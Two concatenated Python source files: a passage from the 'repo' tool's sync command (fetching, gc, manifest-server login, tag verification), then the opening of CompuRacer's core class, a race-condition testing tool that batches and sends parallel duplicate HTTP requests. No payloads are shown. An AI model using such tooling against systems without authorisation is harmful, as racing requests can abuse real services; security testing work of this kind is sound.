To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
Compatibility
~~~~~~~~~~~~~
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help="continue sync even if a project fails to sync")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from a known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchProjectList(self, opt, projects, *args):
"""Main function of the fetch threads when jobs are > 1.
Delegates most of the work to _FetchHelper.
Args:
opt: Program options returned from optparse. See _Options().
projects: Projects to fetch.
*args: Remaining arguments to pass to _FetchHelper. See the
_FetchHelper docstring for details.
"""
for project in projects:
success = self._FetchHelper(opt, project, *args)
if not success and not opt.force_broken:
break
def _FetchHelper(self, opt, project, lock, fetched, pm, sem, err_event):
"""Fetch git objects for a single project.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
err_event: We'll set this event in the case of an error (after printing
out info about the error).
Returns:
Whether the fetch was successful.
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we call sem.release().
# - We always make sure we unlock the lock if we locked it.
try:
try:
start = time.time()
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags, archive=self.manifest.IsArchive)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync',
file=sys.stderr)
else:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
err_event.set()
except:
err_event.set()
raise
finally:
if did_lock:
lock.release()
sem.release()
return success
def _Fetch(self, projects, opt):
fetched = set()
pm = Progress('Fetching projects', len(projects))
if self.jobs == 1:
for project in projects:
pm.update()
if not opt.quiet:
print('Fetching project %s' % project.name)
if project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags,
archive=self.manifest.IsArchive):
fetched.add(project.gitdir)
else:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync', file=sys.stderr)
else:
sys.exit(1)
else:
objdir_project_map = dict()
for project in projects:
objdir_project_map.setdefault(project.objdir, []).append(project)
threads = set()
lock = _threading.Lock()
sem = _threading.Semaphore(self.jobs)
err_event = _threading.Event()
for project_list in objdir_project_map.values():
# Check for any errors before starting any new threads.
# ...we'll let existing threads finish, though.
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target = self._FetchProjectList,
args = (opt,
project_list,
lock,
fetched,
pm,
sem,
err_event))
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet():
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
if not self.manifest.IsArchive:
self._GCProjects(projects)
return fetched
def _GCProjects(self, projects):
gitdirs = {}
for project in projects:
gitdirs[project.gitdir] = project.bare_git
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for bare_git in gitdirs.values():
bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count / jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(bare_git):
try:
try:
bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for bare_git in gitdirs.values():
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(bare_git,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
for path in old_project_paths:
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
if os.path.exists(self.manifest.topdir + '/' + path):
gitdir = os.path.join(self.manifest.topdir, path, '.git')
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = gitdir,
objdir = gitdir,
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return -1
else:
print('Deleting obsolete path %s' % project.worktree,
file=sys.stderr)
shutil.rmtree(project.worktree)
# Try deleting parent subdirs if they are empty
project_dir = os.path.dirname(project.worktree)
while project_dir != self.manifest.topdir:
try:
os.rmdir(project_dir)
except OSError:
break
project_dir = os.path.dirname(project_dir)
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) / 3)
if opt.network_only and opt.detach_head:
print('error: cannot combine -n and -d', file=sys.stderr)
sys.exit(1)
if opt.network_only and opt.local_only:
print('error: cannot combine -n and -l', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_sync:
print('error: cannot combine -m and -s', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_tag:
print('error: cannot combine -m and -t', file=sys.stderr)
sys.exit(1)
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
print('error: -u and -p may only be combined with -s or -t',
file=sys.stderr)
sys.exit(1)
if None in [opt.manifest_server_username, opt.manifest_server_password]:
print('error: both -u and -p must be given', file=sys.stderr)
sys.exit(1)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if not '@' in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
print('.netrc file does not exist or could not be opened',
file=sys.stderr)
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
username, _account, password = \
info.authenticators(parse_result.hostname)
except TypeError:
# TypeError is raised when the given hostname is not present
# in the .netrc file.
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
try:
server = xmlrpc.client.Server(manifest_server)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = "smart_sync_override.xml"
manifest_path = os.path.join(self.manifest.manifestProject.worktree,
manifest_name)
try:
f = open(manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError:
print('error: cannot write manifest to %s' % manifest_path,
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
mp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Stop us from non-stopped fetching actually-missing repos: If set of
# missing repos has not been changed from last fetch, we break.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror or self.manifest.IsArchive:
# bail out now, we have no working tree
return
if self.UpdateProjectList():
sys.exit(1)
syncbuf = SyncBuffer(mp.config,
detach_head = opt.detach_head)
pm = Progress('Syncing work tree', len(all_projects))
for project in all_projects:
pm.update()
if project.worktree:
project.Sync_LocalHalf(syncbuf)
pm.end()
print(file=sys.stderr)
if not syncbuf.Finish():
sys.exit(1)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = Wrapper()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects:
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo."""',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repopickle_fetchtimes')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path, 'rb')
except IOError:
self._times = {}
return self._times
try:
try:
self._times = pickle.load(f)
except IOError:
try:
os.remove(self._path)
except OSError:
pass
self._times = {}
finally:
f.close()
return self._times
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'wb')
try:
pickle.dump(self._times, f)
except (IOError, OSError, pickle.PickleError):
try:
os.remove(self._path)
except OSError:
pass
finally:
f.close()
|
compu_racer_core.py
|
#!/usr/bin/env python3
"""
The CompuRacer class is the heart of the application that manages requests, batches, storage and sending/receiving.
"""
# --- All imports --- #
import copy
import os
import queue
import signal
import threading
import time
import urllib
from enum import Enum
from functools import partial
from multiprocessing import Queue
try:
from tkinter import *
from tkinter import filedialog
except ModuleNotFoundError as e:
# this only happens if the system has no display
# and then we will not use this lib anyway
# look at the check in ../main.py
pass
from tqdm import tqdm
from tabulate import tabulate
import src.batch_sender_async as sender
from src import utils
from .batch import Batch
from .command_processor import CommandProcessor
from .rest_server import RestServer
root = None
try:
root = Tk()
root.withdraw()
except Exception as e:
# this only happens if the system has no display
# and then we will not use this anyway
# look at the check in ../main.py
pass
# --- Authorship information --- #
__author__ = "R.J. van Emous @ Computest"
__license__ = "MIT License"
__version__ = "2019"
__email__ = "rvanemous@computest.nl"
__status__ = "Prototype"
class SortOrder(Enum):
"""
An enum to hold three types of sort-orders
"""
INDEX = partial(lambda x: int(x['id']))
TIME = partial(lambda x: x['timestamp'])
METHOD = partial(lambda x: x['method'])
URL = partial(lambda x: x['url'])
def __str__(self):
return f"SortOrder.{self.name}"
class CompuRacer:
"""
The Core of the race condition testing application
"""
# -------------- String constants -------------- #
CLIENT_VERSION = "1.2"
CLIENT_FILE_lOC = "state/"
CLIENT_CONFIG = CLIENT_FILE_lOC + "state.json"
CLIENT_BACKUP = CLIENT_FILE_lOC + "state.json.backup"
CLIENT_BATCHES_LOC = CLIENT_FILE_lOC + "batches/"
BATCHES_RENDERED_FILE_DIR = 'rendered_files/'
BATCHES_EXP_FILE_DIR = 'exp_files/'
CLI_PROMPT = "racer"
# -------------- Globals -------------- #
# general
shutdown_client = False
is_shutdown = False
requests_list_lock = threading.RLock()
# CompuRacer specific
command_processor = None
rest_interface_thread = None
proxy = None
server_queue = None
server_send_queue = None
dialog_queue = None
state = None
immediate_batch_name = "Imm"
progress_bar_width = 100
def __init__(self, port, proxy, queue):
"""
Creates a new CompuRacer instance
:param queue: the queue to be used when we want to display a filepicker dialog to the user
"""
self.proxy = proxy
# if the queue is None, we cannot and will not show dialogs
self.dialog_queue = queue
# add shutdown hooks
signal.signal(signal.SIGINT, self.force_shutdown)
signal.signal(signal.SIGTERM, self.force_shutdown)
# initialize command processor (just for printing)
self.command_processor = CommandProcessor(self.state)
self.command_processor.set_cli_prompt(self.CLI_PROMPT)
# load main client settings and requests
if os.path.exists(self.CLIENT_FILE_lOC) and \
(os.path.exists(self.CLIENT_CONFIG) or os.path.exists(self.CLIENT_BACKUP)):
utils.clear_output()
self.state = self.get_default_state()
self.command_processor.set_config(self.state)
self.state = self.__load_json(self.CLIENT_CONFIG, self.CLIENT_BACKUP, "Loading current configuration..")
# compatibility with v1.0 and v1.1 state file
self.patch_state_to_v12()
if self.state is None:
# set temp config in command processor
self.state = self.get_default_state()
self.command_processor.set_config(self.state)
self.start_new_state_setup()
# set config in command processor
self.command_processor.set_config(self.state)
# load all batches into state
if not os.path.exists(self.CLIENT_BATCHES_LOC):
os.mkdir(self.CLIENT_BATCHES_LOC)
else:
time.sleep(0.25)
for file in tqdm(os.listdir(self.CLIENT_BATCHES_LOC), desc="Loading batches", ncols=self.progress_bar_width):
self.imp_batch_without_requests_by_name(self, self.CLIENT_BATCHES_LOC + file)
time.sleep(0.25)
self.print_formatted("Done.", utils.QType.INFORMATION)
# initialize command processor (fully)
self.command_processor.set_welcome_function(self.display_welcome, self)
self.add_all_commands()
# initialize the REST server
self.server_send_queue = Queue()
self.rest_server = RestServer(self.state['immediate_mode'], self.server_send_queue, port=port)
def patch_state_to_v12(self):
if 'immediate_settings' in self.state and len(self.state['immediate_settings']) != 5:
self.state['immediate_settings'] = [15, 1, False, True, 20]
elif 'immediate_dup_par_sec' in self.state:
if len(self.state['immediate_dup_par_sec']) == 2:
self.state['immediate_settings'] = [self.state['immediate_dup_par_sec'][0],
self.state['immediate_dup_par_sec'][1], False, True, 20]
else:
self.state['immediate_settings'] = [15, 1, False, True, 20]
del self.state['immediate_dup_par_sec']
def __str__(self):
"""
A string representation of the CompuRacer
:return: the string
"""
return f"CompuRacer = [state = {utils.format_json(self.jsonify_batches(self.state))}]"
def is_changed(self):
"""
Checks whether the current CompuRacer state is changed
:return: True if changed
"""
if not self.state:
return False
if 'changed' in self.state and self.state['changed']:
return True
if self.command_processor.is_changed():
return True
return False
def set_unchanged(self):
"""
Sets the current CompuRacer state to unchanged
:return: True if changed
"""
if not self.state:
return
if 'changed' in self.state:
self.state['changed'] = False
if self.command_processor.is_changed():
self.command_processor.set_changed(False)
def start(self):
"""
Starts the CompuRacer
"""
# indicate whether we use an upstream SOCKS proxy
if self.proxy:
self.print_formatted(f"Using upstream SOCKS proxy: '{self.proxy}'", utils.QType.INFORMATION)
# start the REST server
self.server_queue = self.rest_server.start(self)
# start rest server interfacer (also takes care of immediate thread creation)
self.print_formatted("Starting REST server interface thread..", utils.QType.INFORMATION)
self.rest_interface_thread = threading.Thread(name='REST server interfacer',
target=self.run_rest_server_interfacer,
args=(self, self.server_queue))
self.rest_interface_thread.start()
self.print_formatted("Done..", utils.QType.INFORMATION)
# start client interpreter
self.print_formatted("Starting command processor..", utils.QType.INFORMATION)
time.sleep(0.25)
utils.clear_output()
self.command_processor.start()
def comm_general_save(self, do_print=True):
"""
Stores the current CompuRacer state when changed.
The main settings and requests will be saved in one file and all batches will be saved in one file each
:param do_print: if True, prints the progress
"""
saved_anything = False
# store general state of racer and the requests
if self.is_changed():
saved_anything = True
store_string = None
if do_print:
store_string = "Storing current state.."
state_to_save = copy.deepcopy(self.state)
state_to_save['batches'] = {}
self.set_unchanged()
self.__store_json(self.CLIENT_CONFIG, state_to_save, self.CLIENT_BACKUP, store_string)
time.sleep(0.25)
# store individual batches
if not os.path.exists(self.CLIENT_BATCHES_LOC):
os.mkdir(self.CLIENT_BATCHES_LOC)
if 'batches' in self.state:
for batch_name in tqdm(list(self.state['batches'].keys()), desc="Storing batches", ncols=self.progress_bar_width):
if self.state['batches'][batch_name].changed:
saved_anything = True
self.state['batches'][batch_name].changed = False
self.exp_batch_without_requests_by_name(self, self.CLIENT_BATCHES_LOC, batch_name)
time.sleep(0.25)
# print whether it is changed
if not saved_anything and do_print:
self.print_formatted("State not changed.", string_type=utils.QType.INFORMATION)
elif do_print:
self.print_formatted("Done.", string_type=utils.QType.INFORMATION)
def comm_general_shutdown(self, args=None):
"""
Shuts down the CompuRacer normally
:param args: required for shutdown hook, not used
"""
print()
self.print_formatted("Shutting down client..", string_type=utils.QType.INFORMATION)
self.shutdown_client = True
if self.rest_interface_thread:
self.print_formatted("Stopping rest interface thread..", utils.QType.INFORMATION)
self.rest_interface_thread.join()
self.print_formatted("Done.", utils.QType.INFORMATION)
if self.command_processor:
self.command_processor.shutdown()
self.comm_general_save(True)
self.print_formatted("Done.", string_type=utils.QType.INFORMATION)
self.is_shutdown = True
# only to be called by os signal exit (like after CTRL-C)
def force_shutdown(self, arg=None, arg2=None):
"""
Shuts down the CompuRacer immediatelly
:param arg: required for shutdown hook, not used
:param arg2: ditto
"""
# shutdown initiated, stop rest server, command processor, save state and exit
print()
self.shutdown_client = True
if self.rest_interface_thread:
self.rest_interface_thread.join()
if self.command_processor:
self.command_processor.shutdown(False)
self.comm_general_save(False)
self.is_shutdown = True
def start_new_state_setup(self):
"""
Client setup wizard used on first install
"""
utils.clear_output()
self.print_formatted("# ------- CompuRacer v{} -- setup state ------- #\n".format(self.CLIENT_VERSION),
utils.QType.GREEN)
if not self.command_processor.accept_yes_no("No client state file detected in '{}'. "
"Do you want to setup a new client?".format(self.CLIENT_FILE_lOC),
string_type=utils.QType.WARNING):
self.print_formatted("Please create or import a new state file into: '{}'. \n"
"\tExiting..".format(self.CLIENT_CONFIG), utils.QType.INFORMATION)
exit(0)
else:
self.print_formatted("Creating a new client setup..", utils.QType.INFORMATION)
if not os.path.exists(self.CLIENT_FILE_lOC):
os.mkdir(self.CLIENT_FILE_lOC)
utils.print_colored("This is some RED text.", utils.Color.RED)
colored_output = self.command_processor.accept_yes_no("Is the line above colored red?")
self.print_formatted(f"Colored output enabled is set to: '{colored_output}'", utils.QType.INFORMATION)
self.state = self.create_new_state(colored_output)
self.__store_json(self.CLIENT_CONFIG, self.objectify_batches(self, copy.deepcopy(self.state)),
"Storing current configuration..")
# create batches folder
if not os.path.exists(self.CLIENT_BATCHES_LOC):
os.mkdir(self.CLIENT_BATCHES_LOC)
self.print_formatted("# ------- state setup finished ------- #\n".format(self.CLIENT_VERSION),
utils.QType.GREEN)
time.sleep(0.5)
@staticmethod
def get_default_state():
"""
Gets the default state dictionary
:return: the dict
"""
return {
"display_welcome": True,
"colored_output": False,
"current_batch": None,
"project_name": "",
"batches": {},
"requests": {},
"concepts": None,
"immediate_mode": "off",
"immediate_print": True,
"immediate_settings": [1, 1, False, False, 20],
"cp_history": [],
"changed": True
}
@staticmethod
def create_new_state(colored_output, the_requests=None, project_name="", batches=None, concepts=None, current_batch=None):
"""
Gets the a new state dictionary
:param colored_output: if True, to colors the output
:param the_requests: the dict of requests
:param project_name: the default project name prefix
:param batches: the dict of batches
:param concepts: not used
:param current_batch: the current batch name
:return: the dict
"""
if not the_requests:
the_requests = {}
if not batches:
batches = {}
return {
"display_welcome": True,
"colored_output": colored_output,
"current_batch": current_batch,
"project_name": project_name,
"batches": batches,
"requests": the_requests,
"concepts": concepts,
"immediate_mode": "off",
"immediate_print": True,
"immediate_settings": [1, 1, False, False, 20],
"cp_history": [],
"changed": True
}
@staticmethod
def display_welcome(self):
"""
Displays the welcome string when the application is started
:param self: reference to the CompuRacer
"""
print()
self.print_formatted("CompuRacer v{} started".format(self.CLIENT_VERSION), utils.QType.GREEN)
@staticmethod
def run_rest_server_interfacer(racer, rest_server_queue):
"""
The method that is used in communicating with the REST server
:param racer: a reference to the CompuRacer
:param rest_server_queue: the queue where the REST server sends received requests through
"""
# listen for requests to the REST server and send them to the racer
# it also triggers immediate batch sending if necessary
bunch_start_time = time.time()
immediate_batch_unsent = False
max_diff = 2
while not racer.shutdown_client:
try:
new_item = rest_server_queue.get(timeout=max_diff)
if new_item['type'] == 'request':
new_request = new_item['content']
bunch_start_time = time.time() # restart wait time
immediate_batch_unsent = True
racer.add_request_from_json(new_request)
elif new_item['type'] == 'mode':
racer.comm_mode_change(racer, new_item['content'], False)
elif new_item['type'] == 'settings':
racer.comm_mode_set_settings(racer, new_item['content'][0], new_item['content'][1],
new_item['content'][2], new_item['content'][3],
new_item['content'][4], False)
except queue.Empty:
pass
except Exception as e:
print(e)
if immediate_batch_unsent and time.time() - bunch_start_time > max_diff:
racer.trigger_immediate()
immediate_batch_unsent = False
# -------------- Command loading for processor -------------- #
def add_all_commands(self):
"""
Adds all command types to the command processor
"""
self.add_commands_general()
self.add_commands_mode()
self.add_commands_requests()
self.add_commands_batches()
self.add_commands_current_batch()
def add_commands_general(self):
"""
Adds all commands that are related to the general workings of the application
"""
self.command_processor.add_command(["wel"], self.comm_general_change_welcome,
"Enables or disables the welcome screen on startup.\n"
"Note: Enables when no arguments are provided", self,
arg_spec_opt=[("Enable welcome", bool, True)]
)
self.command_processor.add_command(["col"], self.comm_general_change_color_output,
"Enables or disables the colored output (disable this if you see odd characters).\n"
"Note: Enables when no arguments are provided", self,
arg_spec_opt=[("Enable color", bool, True)]
)
self.command_processor.add_command(["s", "save"], self.comm_general_save, "Saves the current state.", self)
self.command_processor.add_command(["q", "quit"], self.comm_general_shutdown, "Saves the current state and shuts down the racer.", self)
def add_commands_mode(self):
"""
Adds all commands that are related to the immediate mode of the application
"""
self.command_processor.add_command(["mode"], self.comm_mode_change,
"Sets the mode to add incoming requests to: the current batch, a new batch (and send it after 2 secs) or not at all.", self,
arg_spec_opt=[("Change immediate mode: 'off', 'curr' or 'on'", str, "* on: new batch and send mode *")]
)
self.command_processor.add_command(["set mode"], self.comm_mode_set_settings,
"Updates mode settings for parallel and sequential duplication.", self,
arg_spec_opt=[("Parallel duplicates > 0", int, 1),
("Sequential duplicates > 0", int, 1),
("Allow redirects", bool, False),
("Sync last byte", bool, True),
("Send timeout >= 1", int, True)]
)
self.command_processor.add_command(["print mode"], self.comm_mode_change_printing,
"Enables or disables immediate-mode results printing.\n"
"Note: Enables when no arguments are provided", self,
arg_spec_opt=[("Enable immediate mode printing", bool, True)]
)
def add_commands_requests(self):
"""
Adds all commands that are related to viewing, comparing and removing requests
"""
self.command_processor.add_command(["reqs"], self.comm_requests_get,
"Gets a sorted table of basic request info.", self,
arg_spec_opt=[("First request ID", str, "* all requests *"),
("Last request ID", str, "* only first request *"),
(f"Sort order {[str(order) for order in SortOrder]}", SortOrder,
"SortOrder.INDEX"), ("Sort in ascending order", bool, True)]
)
self.command_processor.add_command(["req"], self.comm_requests_get_one,
"Gets a specific request by ID. Getting newest request when no argments are provided.", self,
arg_spec_opt=[("Request ID", str, "* the most recently added request *")]
)
self.command_processor.add_command(["comp reqs"], self.comm_requests_comp,
"Compares the contents of two requests.", self,
arg_spec=[("First request ID", str), ("Second request ID", str)],
arg_spec_opt=[("Also print matches of comparison", bool, False)]
)
self.command_processor.add_command(["rm reqs"], self.comm_requests_remove,
"Deletes the request(s) by ID from the general list.", self,
arg_spec_opt=[("First request ID", str, "* all requests *"),
("Last request ID", str, "* only first request *")]
)
self.command_processor.add_command(["lower reqs"], self.comm_requests_lower_ids,
"Re-creates the ids of all requests so that it is a sequencial list starting at 1.\n"
"Note: Also updates the ids in all batches. Could take some time", self)
def add_commands_batches(self):
"""
Adds all commands that are related to creating, viewing, updating, copying, comparing importing/exporting
and removing of batches
"""
self.command_processor.add_command(["go"], self.comm_batches_send,
